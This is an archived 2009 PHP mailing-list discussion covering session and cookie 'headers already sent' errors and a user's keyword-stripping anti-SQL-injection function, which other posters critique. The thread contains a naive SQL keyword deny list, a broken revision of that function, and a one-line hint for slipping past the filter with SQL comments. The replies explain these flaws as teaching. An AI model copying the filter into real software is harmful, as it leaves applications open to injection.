> > C:\xampp\htdocs\weiss\assessresult.inc.php on line 6
> >
> > Warning: Cannot modify header information - headers already sent by (output
> > started at C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > C:\xampp\htdocs\weiss\assessresult.inc.php on line 7
> >
> > If I delete and start over, I still get the "headers already sent"... I have
> > tried numerous other variations, but all with the same error.
> >
> > What am I missing here?
> >
> > Thanks
> >
> > Gary
> >
> >
> >
> I would have thought it was obvious, the file assessresult.inc.php is
> being called before your session_start(). Have you put your code before
> every include?
>
>
> Ash
> www.ashleysheridan.co.uk
Re: [PHP] $_session/$_cookie trouble
Make sure your file isn't a UTF-8 with DOM. Regards, Igor Escobar Systems Analyst & Interface Designer -- Personal Blog ~ blog.igorescobar.com Online Portifolio ~ www.igorescobar.com Twitter ~ @igorescobar On Tue, Apr 28, 2009 at 5:13 PM, Ashley Sheridan wrote: > On Tue, 2009-04-28 at 15:34 -0400, Gary wrote: > > Ashley > > > > There are 3 include files, the first is all html, but it has a form, so I > > put the session_start above the DTD and I no longer get the error > messages. > > > > I had the session_start at the beginning of the second file, the php > > processing file, but that produced the error. It seemed to be calling to > > itself (if that does not sound too naive). > > > > As I mentioned in a post above, I am no longer getting the error message, > > but have been unable to get either the $_SESSION or the cookie to produce > > results... > > > > Thanks for your help. > > > > Gary > > "Ashley Sheridan" wrote in message > > news:1240947209.3494.65.ca...@localhost.localdomain... > > > On Tue, 2009-04-28 at 15:24 -0400, Gary wrote: > > >> Ashley > > >> > > >> Thanks for your reply, but no, that is not it. There was no other > code > > >> prior. > > >> > > >> Gary > > >> "Ashley Sheridan" wrote in message > > >> news:1240945179.3494.61.ca...@localhost.localdomain... > > >> > On Tue, 2009-04-28 at 10:48 -0400, Gary wrote: > > >> >> I am trying to set a cookie and a session, but seem to be running > into > > >> >> a > > >> >> wall. 
> > >> >> > > >> >> I have tried different variations, and keep getting the same error > > >> >> message > > >> >> > > >> >> If I have this > > >> >> > > >> >> > >> >> > > >> >> session_start(); > > >> >> > > >> >> I get this: > > >> >> Warning: session_start() [function.session-start]: Cannot send > session > > >> >> cookie - headers already sent by (output started at > > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php:2) in > > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php on line 4 > > >> >> > > >> >> Warning: session_start() [function.session-start]: Cannot send > session > > >> >> cache > > >> >> limiter - headers already sent (output started at > > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php:2) in > > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php on line 4 > > >> >> > > >> >> If I have this: > > >> >> session_start(); > > >> >> > > >> >> setcookie('sale_cookie','$sale_value', time()-3600); > > >> >> setcookie('assess_cookie','$assess_value', time()-3600); > > >> >> I get this > > >> >> > > >> >> > > >> >> Warning: session_start() [function.session-start]: Cannot send > session > > >> >> cookie - headers already sent by (output started at > > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php:2) in > > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php on line 4 > > >> >> > > >> >> Warning: session_start() [function.session-start]: Cannot send > session > > >> >> cache > > >> >> limiter - headers already sent (output started at > > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php:2) in > > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php on line 4 > > >> >> > > >> >> Warning: Cannot modify header information - headers already sent by > > >> >> (output > > >> >> started at C:\xampp\htdocs\weiss\assessresult.inc.php:2) in > > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php on line 6 > > >> >> > > >> >> Warning: Cannot modify header information - headers already sent by > > >> >> (output > > >> >> started at C:\xampp\htdocs\weiss\assessresult.inc.php:2) 
in > > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php on line 7 > > >> >> > > >> >> If I delete and start over, I stll get the "headers already > sent"... I > > >> >> have > > >> >> tried numerous other variations, but all with the same error. > > >> >> > > >> >> What am I missing here? > > >> >> > > >> >> Thanks > > >> >> > > >> >> Gary > > >> >> > > >> >> > > >> >> > > >> > I would have thought it was obvious, the file assessresult.inc.php > is > > >> > being called before your session_start(). Have you put your code > before > > >> > every include? > > >> > > > >> > > > >> > Ash > > >> > www.ashleysheridan.co.uk > > >> > > > >> > > >> > > >> > > > The code is being pulled in from somewhere, have you checked to see if > > > the framework you are using is pulling it in? > > > > > > > > > Ash > > > www.ashleysheridan.co.uk > > > > > > > > > > There it is then. The HTML file causes the headers to be sent. Any > output to the browser at all causes the headers to be sent, so any HTML > or even spaces and newlines will trigger this error. > > > Ash > www.ashleysheridan.co.uk > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
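The message above explains that any output, even spaces or newlines, sends the headers before session_start() can run. As an added example (not code from the thread), the following uses PHP's tokenizer to list every place a source file emits raw output, including a UTF-8 byte order mark; the function name and the sample strings are constructed.

```php
<?php
declare(strict_types=1);

// List every chunk of a PHP source file that is sent to the browser as-is
// (T_INLINE_HTML tokens). In a file that must call session_start(),
// setcookie() or header(), any such chunk that comes first triggers the
// "headers already sent" warning.
function find_raw_output(string $source): array
{
    $found = [];
    foreach (token_get_all($source) as $token) {
        if (!is_array($token) || $token[0] !== T_INLINE_HTML) {
            continue;
        }
        [, $text, $line] = $token;
        if (strncmp($text, "\xEF\xBB\xBF", 3) === 0) {
            $kind = 'UTF-8 BOM';
        } elseif (trim($text) === '') {
            $kind = 'whitespace';
        } else {
            $kind = 'HTML or text';
        }
        $found[] = ['line' => $line, 'kind' => $kind, 'bytes' => strlen($text)];
    }
    return $found;
}

function describe(string $label, string $source): void
{
    $hits = find_raw_output($source);
    if ($hits === []) {
        echo "$label: no raw output\n";
        return;
    }
    foreach ($hits as $hit) {
        printf("%s: %s at line %d (%d bytes)\n",
            $label, $hit['kind'], $hit['line'], $hit['bytes']);
    }
}

// Constructed samples, one per cause raised in the thread.
$samples = [
    'clean'               => "<?php\nsession_start();\n",
    'BOM'                 => "\xEF\xBB\xBF<?php\nsession_start();\n",
    'leading newline'     => "\n<?php\nsession_start();\n",
    'HTML first'          => "<!DOCTYPE html>\n<?php\nsession_start();\n",
    'blank line after ?>' => "<?php\n\$x = 1;\n?>\n\n",
];
foreach ($samples as $label => $source) {
    describe($label, $source);
}

// Real files can be checked by passing paths: php check.php a.php b.inc.php
foreach (array_slice($argv ?? [], 1) as $path) {
    $source = is_readable($path) ? file_get_contents($path) : false;
    if ($source === false) {
        echo "$path: cannot read\n";
        continue;
    }
    describe($path, $source);
}
```

PHP swallows a single newline directly after `?>`, which is why only the extra blank line in the last sample is reported.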
Re: [PHP] Re: $_session/$_cookie trouble
A few days ago i had a problem similar to their and it was a problem with files with BOM signature... maybe its your case. Regards, Igor Escobar Systems Analyst & Interface Designer -- Personal Blog ~ blog.igorescobar.com Online Portifolio ~ www.igorescobar.com Twitter ~ @igorescobar On Tue, Apr 28, 2009 at 11:00 PM, Gary wrote: > Ok, working code. I'm sure there is some left over code that is not > actually working, but I have been playing frankenstein all day. Basically a > vistor fills in 3 (only two set so far) inputs to see if they qualify for a > rebate. If they do, they can go on to file two to submit their > information. > > This is my first project using $_cookie or $_session. I have done an > exercise or two in lessons using them, but this is my first attempt from > scratch. > > File1 of 2 > session_start(); > ?> > > $_SESSION=array('$sale_value', 'assess_value'); > > > $sale_value=$_POST['sale']; > $assess_value=$_POST['assess']; > > $mil_rate=.03965; > $ratio=.51; > > $present_tax=($assess_value) * ($mil_rate); > $correct_tax=($sale_value)*($ratio)*($mil_rate); > $savings=($present_tax)-($correct_tax); > > if ($savings > 0.00){ > echo 'Yes, Your property appears to > qualify!'; > } > if ($savings < 0.00){ > echo 'NO, Your property does not appear to qualify. > '; > } > echo 'According to the information you have entered';?> > echo "You believe your home would today sell for > $".number_format($sale_value).""; > echo "Your current tax assessment is $".number_format($assess_value)." />"; > echo 'You live in '; > echo 'According to preliminary calculations'; > echo "You are currently paying now $".number_format($present_tax, 2)." />"; > echo "According to the information you have submitted, your taxes should be > $ ".number_format($correct_tax, 2).""; > ?> > if ($savings > 0.00){ > echo "According to our preliminary calculations, a successful assessment > appeal could save you annually on your current real estate taxes. $ > ".number_format($savings, 2)." 
"; > } > if ($savings < 0.00){ > echo 'It does not appear that an appeal would be successful in saving you > money this year. If property values in your area continue to decline, you > may wish to revisit the issue next year.'; > } > > $_SESSION['sale_value'] ='$sale_value'; > $_SESSION['assess_value'] ='$assess_value'; > > ?> > If you feel you have entered > incorrect information, hit your browsers back button to re-calculate with > the new information > Important > Notice! > This DOES > NOT > constitute a legal opinion by ! No information has been > submitted. > In order to proceed with an assessment appeal, you must contact my > office > that we may verify all pertinent information regarding your a real estate > assessment appeal case > > To submit this information to , please complete the following form. > > > First Name > Last Name > Property Street Address > Town or City > Zip Code > County > Phone Number > E-Mail Address > > > > > File 2 > > > ?> > "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd";> > http://www.w3.org/1999/xhtml";> > > > Untitled Document > > > > $fname=STRIPSLASHES($_POST['fname']); > $lname=STRIPSLASHES($_POST['lname']); > $street=STRIPSLASHES($_POST['street']); > $town=STRIPSLASHES($_POST['town']); > $zip=STRIPSLASHES($_POST['zip']); > $county=STRIPSLASHES($_POST['county']); > $phone=STRIPSLASHES($_POST['phone']); > $email=STRIPSLASHES($_POST['email']); > $assess_value=$_COOKIE['assess_value']; > $sale_value=$_COOKIE['sale_value']; > > > echo "Thank you $fname for your submission!"; > echo "You have submitted the following information."; > echo "Name:$fname $lname"; > echo "Address:$street $town $zip"; > echo "Phone Number: $phone"; > echo "E-Mail Address: $email"; > echo "You believe your home would sell for $"; echo > $_COOKIE['sale_cookie']; > ?> echo "Your assessment value is $"; echo $_COOKIE['assess_cookie'];?> /> echo "You live in $county"; > > > > > > ?> > > > > > > "Lists" wrote in message 
news:49f790ed.5040...@euca.us... > > Andr
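The cause Ash and Igor describe (HTML, blank lines or a BOM emitted before session_start()) can be checked mechanically. The following is an added example, not code from any poster in the thread: it uses PHP's tokenizer to list everything a single source file sends before its first session_start() call. The function name and the sample file contents are constructed for illustration, and included files are not followed.

```php
<?php
// Added example: report output that precedes session_start() in one file.

/**
 * Returns one finding (line number + kind) for each piece of output that
 * comes before the first session_start() call in $source.
 */
function outputBeforeSessionStart(string $source): array
{
    $findings = array();
    foreach (token_get_all($source) as $token) {
        if (!is_array($token)) {
            continue; // single-character tokens such as ';' or '('
        }
        list($id, $text, $line) = $token;

        if ($id === T_STRING && strcasecmp($text, 'session_start') === 0) {
            break; // output after this point cannot cause the warning
        }
        if ($id === T_INLINE_HTML) {
            // Anything outside the PHP tags is sent as-is, including a BOM.
            if (strncmp($text, "\xEF\xBB\xBF", 3) === 0) {
                $kind = 'UTF-8 BOM';
            } elseif (trim($text) === '') {
                $kind = 'whitespace outside PHP tags';
            } else {
                $kind = 'HTML/text outside PHP tags';
            }
            $findings[] = array('line' => $line, 'kind' => $kind);
        } elseif ($id === T_ECHO || $id === T_PRINT
                  || $id === T_OPEN_TAG_WITH_ECHO) {
            $findings[] = array('line' => $line, 'kind' => 'echo/print statement');
        }
    }
    return $findings;
}

// Constructed sample file contents (not the poster's real files).
$samples = array(
    'clean.php'      => "<?php\nsession_start();\n",
    'bom.php'        => "\xEF\xBB\xBF<?php\nsession_start();\n",
    'html_first.php' => "<html>\n<body>\n<?php\nsession_start();\n",
    'blank_gap.php'  => "<?php\n\$rate = 0.51;\n?>\n\n<?php\nsession_start();\n",
);

foreach ($samples as $name => $source) {
    $findings = outputBeforeSessionStart($source);
    if (!$findings) {
        echo "$name: nothing is sent before session_start()\n";
        continue;
    }
    foreach ($findings as $finding) {
        printf("%s: line %d: %s\n", $name, $finding['line'], $finding['kind']);
    }
}
```

To check a real file, pass it as `outputBeforeSessionStart(file_get_contents($path))`; a single newline directly after a closing tag is swallowed by PHP and is therefore not reported.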
[PHP] SQL Injection - Solution
Hi folks,

Does anyone know how I can improve this function to protect my environment vars from SQL injection attacks?

This is the function I use to do this, but some people think it is not enough:

    /**
     * @uses $_REQUEST = _antiSqlInjection($_REQUEST);
     * @uses $_POST = _antiSqlInjection($_POST);
     * @uses $_GET = _antiSqlInjection($_GET);
     *
     * @author Igor Escobar
     * @email blog [at] igorescobar [dot] com
     *
     */
    function _antiSqlInjection($Target){
        $sanitizeRules = array('OR','FROM','SELECT','INSERT','DELETE','WHERE','DROP TABLE','SHOW TABLES','*','--','=');
        $arraSanitized = array();
        foreach($Target as $key => $value):
            if(is_array($value)):
                $arraSanitized[$key] = _antiSqlInjection($value);
            else:
                $arraSanitized[$key] = addslashes(strip_tags(trim(str_replace($sanitizeRules,"",$value))));
            endif;
        endforeach;
        return $arraSanitized;
    }

Can you help me improve it?

Regards,
Igor Escobar
Systems Analyst & Interface Designer
--
Personal Blog ~ blog.igorescobar.com
Online Portifolio ~ www.igorescobar.com
Twitter ~ @igorescobar
Re: [PHP] SQL Injection - Solution
I know that use the mysql_real_escape_string to do de job is better but you should consider that the this function don't have any access to the data base, to objective of this function is sanitize the string. And please, see my second answer, i make some updates in the function that possibly is relevant. Regards, Igor Escobar Systems Analyst & Interface Designer -- Personal Blog ~ blog.igorescobar.com Online Portifolio ~ www.igorescobar.com Twitter ~ @igorescobar On Wed, May 6, 2009 at 1:14 PM, Andrew Ballard wrote: > On Wed, May 6, 2009 at 12:06 PM, Bruno Fajardo > wrote: > > Hi there! > > > > 2009/5/6 Igor Escobar > >> > >> Hi folks, > >> Someone know how i can improve this function to protect my envairounment > >> vars of sql injection attacks. > >> > >> that is the function i use to do this, but, some people think is not > enough: > >> > >> * @uses $_REQUEST= _antiSqlInjection($_REQUEST); > >> * @uses $_POST = _antiSqlInjection($_POST); > >> * @uses $_GET = _antiSqlInjection($_GET); > >> * > >> * @author Igor Escobar > >> * @email blog [at] igorescobar [dot] com > >> * > >> */ > >> > >> function _antiSqlInjection($Target){ > >>$sanitizeRules = > >> array('OR','FROM,'SELECT','INSERT','DELETE','WHERE','DROP TABLE','SHOW > >> TABLES','*','--','='); > >>foreach($Target as $key => $value): > >>if(is_array($value)): $arraSanitized[$key] = > _antiSqlInjection($value); > >>else: > >>$arraSanitized[$key] = > >> addslashes(strip_tags(trim(str_replace($sanitizeRules,"",$value; > >>endif; > >>endforeach; > >>return $arraSanitized; > >> > >> > >> } > >> > >> You can help me to improve them? > > > > What if someone posts, in any form of your app, a message containing > > "or", "from" or "where"? Those are very common words, and eliminate > > them is not the best solution, IMO. 
> > Use mysql_real_escape_string() like Shawn said, possibly something > > like this would do the trick (from > > http://br2.php.net/manual/en/function.mysql-query.php): > > > > $query = sprintf("SELECT firstname, lastname, address, age FROM > > friends WHERE firstname='%s' AND lastname='%s'", > > mysql_real_escape_string($firstname), > > mysql_real_escape_string($lastname)); > > > > Cheers, > > Bruno. > > +1 > > I would stick with parameterized queries if available, or just use > mysql_real_escape_string() for these and a few more reasons: > > 1) You'll find lots of posts in the archives explaining why > mysql_real_escape_string() is preferred over addslashes() for this > purpose. > > 2) strip_tags has absolutely nothing to do with SQL injection. Neither > does trim(). There are cases where you would not want to use either of > those functions on input, but you would still need to guard against > injection. > > 3) DROP TABLE will work no matter how many white-space characters > appeared between the words. For that matter, I am pretty sure that > 'DROP /* some bogus SQL comment to make it past your filter */ TABLE' > will work also. > > > Andrew >
Re: [PHP] Re: SQL Injection - Solution
hun...by the way I forgot to mention, I am Brazilian and here in Brazil these words are not common ... That is a recursive function and i can use array_map becouse i some cases we obtain arrays of arrays and that will generate a error. Regards, Igor Escobar Systems Analyst & Interface Designer -- Personal Blog ~ blog.igorescobar.com Online Portifolio ~ www.igorescobar.com Twitter ~ @igorescobar On Wed, May 6, 2009 at 2:36 PM, Shawn McKenzie wrote: > Igor Escobar wrote: > > Hunnn... > > > > So, what do you think now? > > > > function _antiSqlInjection($Target){ > > $sanitizeRules = > > array('OR','FROM','SELECT','INSERT','DELETE','WHERE','DROP > > TABLE','SHOW TABLES','*','--','='); > > foreach($Target as $key => $value): > > if(is_array($value)): $arraSanitized[$key] = > > _antiSqlInjection($value); > > else: > > $arraSanitized[$key] = (!get_magic_quotes_gpc()) ? > > addslashes(str_ireplace(trim($sanitizeRules,"",$value))) : > > str_ireplace(trim($sanitizeRules,"",$value)); > > endif; > > endforeach; > > return $arraSanitized; > > } > > > Stay on list please. I don't like the ternary or the brace omissions > (alternate syntax) :-) however > > My point was that in my opinion you don't need the replace at all. > Also, do you really want to strip all 'or', * and = from all fields? > These may be perfectly valid in your app. Or is a very, very common > word, so is from and come to think of it, where, select, insert and delete. > > For any of the SQL injections to work in your query, there will need to > be quotes or the backtick ` in the user supplied content. The quotes > are escaped by mysql_real_escape_string(). > > I don't see any way for a SQL injection without the user input > containing quotes or the backtick to break out of your query or > prematurely terminate an expression. 
Some examples here, however they > don't mention the backtick: > http://us2.php.net/manual/en/security.database.sql-injection.php > > This might be more useful: > > ||function _antiSqlInjection($Target) > { >if(is_array($Target)) { >$Value = array_map('_antiSqlInjection', $Target); >} else { > if(get_magic_quotes_gpc()) { > $Target = stripslashes($Target); >} > // replace backtick with single quote or whatever >$Target = str_replace("`", "'", $Target); >$Value = mysql_real_escape_string($Target); >} >return $Value; > } > > Thanks! > -Shawn > > >
Re: [PHP] Re: SQL Injection - Solution
Now i realize... i sent only to the Shawn the modified functions... here goes: function _antiSqlInjection($Target){ $sanitizeRules = array('OR','FROM','SELECT','INSERT','DELETE','WHERE','DROP TABLE','SHOW TABLES','*','--','='); foreach($Target as $key => $value): if(is_array($value)): $arraSanitized[$key] = _antiSqlInjection($value); else: $arraSanitized[$key] = (!get_magic_quotes_gpc()) ? addslashes(str_ireplace(trim($sanitizeRules,"",$value))) : str_ireplace(trim($sanitizeRules,"",$value)); endif; endforeach; return $arraSanitized; } Regards, Igor Escobar Systems Analyst & Interface Designer -- Personal Blog ~ blog.igorescobar.com Online Portifolio ~ www.igorescobar.com Twitter ~ @igorescobar On Wed, May 6, 2009 at 2:55 PM, Igor Escobar wrote: > hun...by the way I forgot to mention, I am Brazilian and here in Brazil > these words are not common ... > > That is a recursive function and i can use array_map becouse i some cases > we obtain arrays of arrays and that will generate a error. > > > Regards, > Igor Escobar > Systems Analyst & Interface Designer > > -- > > Personal Blog > ~ blog.igorescobar.com > Online Portifolio > ~ www.igorescobar.com > Twitter > ~ @igorescobar > > > > > > On Wed, May 6, 2009 at 2:36 PM, Shawn McKenzie wrote: > >> Igor Escobar wrote: >> > Hunnn... >> > >> > So, what do you think now? >> > >> > function _antiSqlInjection($Target){ >> > $sanitizeRules = >> > array('OR','FROM','SELECT','INSERT','DELETE','WHERE','DROP >> > TABLE','SHOW TABLES','*','--','='); >> > foreach($Target as $key => $value): >> > if(is_array($value)): $arraSanitized[$key] = >> > _antiSqlInjection($value); >> > else: >> > $arraSanitized[$key] = (!get_magic_quotes_gpc()) ? >> > addslashes(str_ireplace(trim($sanitizeRules,"",$value))) : >> > str_ireplace(trim($sanitizeRules,"",$value)); >> > endif; >> > endforeach; >> > return $arraSanitized; >> > } >> > >> Stay on list please. 
I don't like the ternary or the brace omissions >> (alternate syntax) :-) however >> >> My point was that in my opinion you don't need the replace at all. >> Also, do you really want to strip all 'or', * and = from all fields? >> These may be perfectly valid in your app. Or is a very, very common >> word, so is from and come to think of it, where, select, insert and >> delete. >> >> For any of the SQL injections to work in your query, there will need to >> be quotes or the backtick ` in the user supplied content. The quotes >> are escaped by mysql_real_escape_string(). >> >> I don't see any way for a SQL injection without the user input >> containing quotes or the backtick to break out of your query or >> prematurely terminate an expression. Some examples here, however they >> don't mention the backtick: >> http://us2.php.net/manual/en/security.database.sql-injection.php >> >> This might be more useful: >> >> ||function _antiSqlInjection($Target) >> { >>if(is_array($Target)) { >>$Value = array_map('_antiSqlInjection', $Target); >>} else { >> if(get_magic_quotes_gpc()) { >> $Target = stripslashes($Target); >>} >> // replace backtick with single quote or whatever >>$Target = str_replace("`", "'", $Target); >>$Value = mysql_real_escape_string($Target); >>} >>return $Value; >> } >> >> Thanks! >> -Shawn >> >> >> >
Re: [PHP] Re: SQL Injection - Solution
Yeah yeah, i understood that, but, the point is... i sad previously, my function is not tied to any database. Is a generic function, i dont know who be use this, so i don't know, what is your data base so, i can't use functions like mysql_real_scape_string etc... Regards, Igor Escobar Systems Analyst & Interface Designer -- Personal Blog ~ blog.igorescobar.com Online Portifolio ~ www.igorescobar.com Twitter ~ @igorescobar On Wed, May 6, 2009 at 3:00 PM, Bruno Fajardo wrote: > 2009/5/6 Igor Escobar : > > hun...by the way I forgot to mention, I am Brazilian and here in > Brazil > > these words are not common ... > > Igor, > > I'm brazilian too, but that is not the point. Deny the use of *any* > word as input in your app is unnecessary. The problem that you're > trying to solve, has been solved a long time ago. > > Bruno. > > > > > That is a recursive function and i can use array_map becouse i some cases > we > > obtain arrays of arrays and that will generate a error. > > > > > > Regards, > > Igor Escobar > > Systems Analyst & Interface Designer > > > > -- > > > > Personal Blog > > ~ blog.igorescobar.com > > Online Portifolio > > ~ www.igorescobar.com > > Twitter > > ~ @igorescobar > > > > > > > > > > > > On Wed, May 6, 2009 at 2:36 PM, Shawn McKenzie > wrote: > > > >> Igor Escobar wrote: > >> > Hunnn... > >> > > >> > So, what do you think now? > >> > > >> > function _antiSqlInjection($Target){ > >> > $sanitizeRules = > >> > array('OR','FROM','SELECT','INSERT','DELETE','WHERE','DROP > >> > TABLE','SHOW TABLES','*','--','='); > >> > foreach($Target as $key => $value): > >> > if(is_array($value)): $arraSanitized[$key] = > >> > _antiSqlInjection($value); > >> > else: > >> > $arraSanitized[$key] = (!get_magic_quotes_gpc()) ? > >> > addslashes(str_ireplace(trim($sanitizeRules,"",$value))) : > >> > str_ireplace(trim($sanitizeRules,"",$value)); > >> > endif; > >> > endforeach; > >> > return $arraSanitized; > >> > } > >> > > >> Stay on list please. 
I don't like the ternary or the brace omissions > >> (alternate syntax) :-) however > >> > >> My point was that in my opinion you don't need the replace at all. > >> Also, do you really want to strip all 'or', * and = from all fields? > >> These may be perfectly valid in your app. Or is a very, very common > >> word, so is from and come to think of it, where, select, insert and > delete. > >> > >> For any of the SQL injections to work in your query, there will need to > >> be quotes or the backtick ` in the user supplied content. The quotes > >> are escaped by mysql_real_escape_string(). > >> > >> I don't see any way for a SQL injection without the user input > >> containing quotes or the backtick to break out of your query or > >> prematurely terminate an expression. Some examples here, however they > >> don't mention the backtick: > >> http://us2.php.net/manual/en/security.database.sql-injection.php > >> > >> This might be more useful: > >> > >> ||function _antiSqlInjection($Target) > >> { > >>if(is_array($Target)) { > >>$Value = array_map('_antiSqlInjection', $Target); > >>} else { > >> if(get_magic_quotes_gpc()) { > >> $Target = stripslashes($Target); > >>} > >> // replace backtick with single quote or whatever > >>$Target = str_replace("`", "'", $Target); > >>$Value = mysql_real_escape_string($Target); > >>} > >>return $Value; > >> } > >> > >> Thanks! > >> -Shawn > >> > >> > >> > > >
Re: [PHP] Re: SQL Injection - Solution
Ok guys, thanks. Regards, Igor Escobar Systems Analyst & Interface Designer -- Personal Blog ~ blog.igorescobar.com Online Portifolio ~ www.igorescobar.com Twitter ~ @igorescobar On Thu, May 7, 2009 at 7:32 AM, Jan G.B. wrote: > What about declare, cast, unhex, exec etc.? > You Replace everything with "" isn't so good, I believe. Others > mentiond it before, that *, =, select, from ETC. are valid words and > characters in an other context. > > Anayse some attacks before trying to defend them. Injections can be > heavily db-dependent, so filtering the common words might not be so > insightful. > > If you really want to go the filter approach, then check out this > project and learn from them. ;) > http://php-ids.org/ > > > byebye > > 2009/5/6 Igor Escobar : > > Yeah yeah, i understood that, but, the point is... i sad previously, my > > function is not tied to any database. > > > > Is a generic function, i dont know who be use this, so i don't know, what > is > > your data base so, i can't use functions like mysql_real_scape_string > etc... > > > > > > Regards, > > Igor Escobar > > Systems Analyst & Interface Designer > > > > -- > > > > Personal Blog > > ~ blog.igorescobar.com > > Online Portifolio > > ~ www.igorescobar.com > > Twitter > > ~ @igorescobar > > > > > > > > > > > > On Wed, May 6, 2009 at 3:00 PM, Bruno Fajardo > wrote: > > > >> 2009/5/6 Igor Escobar : > >> > hun...by the way I forgot to mention, I am Brazilian and here in > >> Brazil > >> > these words are not common ... > >> > >> Igor, > >> > >> I'm brazilian too, but that is not the point. Deny the use of *any* > >> word as input in your app is unnecessary. The problem that you're > >> trying to solve, has been solved a long time ago. > >> > >> Bruno. > >> > >> > > >> > That is a recursive function and i can use array_map becouse i some > cases > >> we > >> > obtain arrays of arrays and that will generate a error. 
> >> > > >> > > >> > Regards, > >> > Igor Escobar > >> > Systems Analyst & Interface Designer > >> > > >> > -- > >> > > >> > Personal Blog > >> > ~ blog.igorescobar.com > >> > Online Portifolio > >> > ~ www.igorescobar.com > >> > Twitter > >> > ~ @igorescobar > >> > > >> > > >> > > >> > > >> > > >> > On Wed, May 6, 2009 at 2:36 PM, Shawn McKenzie > >> wrote: > >> > > >> >> Igor Escobar wrote: > >> >> > Hunnn... > >> >> > > >> >> > So, what do you think now? > >> >> > > >> >> > function _antiSqlInjection($Target){ > >> >> > $sanitizeRules = > >> >> > array('OR','FROM','SELECT','INSERT','DELETE','WHERE','DROP > >> >> > TABLE','SHOW TABLES','*','--','='); > >> >> > foreach($Target as $key => $value): > >> >> > if(is_array($value)): $arraSanitized[$key] = > >> >> > _antiSqlInjection($value); > >> >> > else: > >> >> > $arraSanitized[$key] = (!get_magic_quotes_gpc()) ? > >> >> > addslashes(str_ireplace(trim($sanitizeRules,"",$value))) : > >> >> > str_ireplace(trim($sanitizeRules,"",$value)); > >> >> > endif; > >> >> > endforeach; > >> >> > return $arraSanitized; > >> >> > } > >> >> > > >> >> Stay on list please. I don't like the ternary or the brace omissions > >> >> (alternate syntax) :-) however > >> >> > >> >> My point was that in my opinion you don't need the replace at all. > >> >> Also, do you really want to strip all 'or', * and = from all fields? > >> >> These may be perfectly valid in your app. Or is a very, very common > >> >> word, so is from and come to think of it, where, select, insert and > >> delete. > >> >> > >> >> For any of the SQL injections to work in your query, there will need > to > >> >> be quotes or the backtick ` in the user supplied content. The quotes > >> >> are escaped by mysql_real_escape_string(). > >> >> > >> >> I don't see any way for a SQL injection without the user input > >> >> containing quotes or the backtick to break out of your query or > >> >> prematurely terminate an expression. 
Some examples here, however > they > >> >> don't mention the backtick: > >> >> http://us2.php.net/manual/en/security.database.sql-injection.php > >> >> > >> >> This might be more useful: > >> >> > >> >> ||function _antiSqlInjection($Target) > >> >> { > >> >>if(is_array($Target)) { > >> >>$Value = array_map('_antiSqlInjection', $Target); > >> >>} else { > >> >> if(get_magic_quotes_gpc()) { > >> >> $Target = stripslashes($Target); > >> >>} > >> >> // replace backtick with single quote or whatever > >> >>$Target = str_replace("`", "'", $Target); > >> >>$Value = mysql_real_escape_string($Target); > >> >>} > >> >>return $Value; > >> >> } > >> >> > >> >> Thanks! > >> >> -Shawn > >> >> > >> >> > >> >> > >> > > >> > > >
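The objections raised in this thread, shown side by side as an added example (written for this page, not code from any poster): the keyword filter damages ordinary input and misses a statement with extra whitespace, while a parameterized query stores and matches the same strings unchanged. It assumes PHP 7+ with the pdo_sqlite extension; the friends table follows Bruno's query, and the helper names and sample values are constructed.

```php
<?php
// Added example. All sample values below are constructed.

// Keyword list from the thread's _antiSqlInjection().
$sanitizeRules = array('OR', 'FROM', 'SELECT', 'INSERT', 'DELETE', 'WHERE',
                       'DROP TABLE', 'SHOW TABLES', '*', '--', '=');

/** The thread's filtering step applied to a single string. */
function keywordFilter(string $value, array $rules): string
{
    return addslashes(trim(str_ireplace($rules, '', $value)));
}

/** Parameterized lookup: the values never become part of the SQL text. */
function lookupFriend(PDO $pdo, string $firstname, string $lastname): array
{
    $stmt = $pdo->prepare(
        'SELECT firstname, lastname, address, age FROM friends
          WHERE firstname = ? AND lastname = ?'
    );
    $stmt->execute(array($firstname, $lastname));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Number of rows in the friends table. */
function countFriends(PDO $pdo): int
{
    return (int) $pdo->query('SELECT COUNT(*) FROM friends')->fetchColumn();
}

// 1. Ordinary input is damaged by the filter (Bruno's and Shawn's point).
echo "Keyword filter on ordinary input:\n";
foreach (array('Victor from Orlando', '2 * 3 = 6', "O'Reilly") as $input) {
    printf("  %-22s -> %s\n", $input, keywordFilter($input, $sanitizeRules));
}

// 2. The 'DROP TABLE' rule only matches one exact spacing (Andrew's point 3).
$spaced = 'DROP  TABLE friends'; // two spaces between the words
printf("  %-22s -> %s\n", $spaced, keywordFilter($spaced, $sanitizeRules));

// 3. Parameterized queries through PDO. The driver here is in-memory SQLite
//    (an assumption of this example); with another driver only the DSN changes.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE friends
            (firstname TEXT, lastname TEXT, address TEXT, age INTEGER)');

$insert = $pdo->prepare(
    'INSERT INTO friends (firstname, lastname, address, age) VALUES (?, ?, ?, ?)'
);
$insert->execute(array('Victor', "O'Reilly", '9 Select Road -- Orlando', 41));

// The stored values come back byte for byte, quotes and keywords included.
$rows = lookupFriend($pdo, 'Victor', "O'Reilly");
echo "\nParameterized lookup:\n";
printf("  rows found: %d, address stored as: %s\n",
       count($rows), $rows[0]['address']);

// A value carrying a quote and SQL keywords is compared as plain data:
// it matches no row and the table is untouched.
$odd  = "O'Reilly' -- DROP  TABLE friends";
$rows = lookupFriend($pdo, 'Victor', $odd);
printf("  rows found for odd value: %d, rows in table: %d\n",
       count($rows), countFriends($pdo));
```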
Re: [PHP] Re: Progressbar
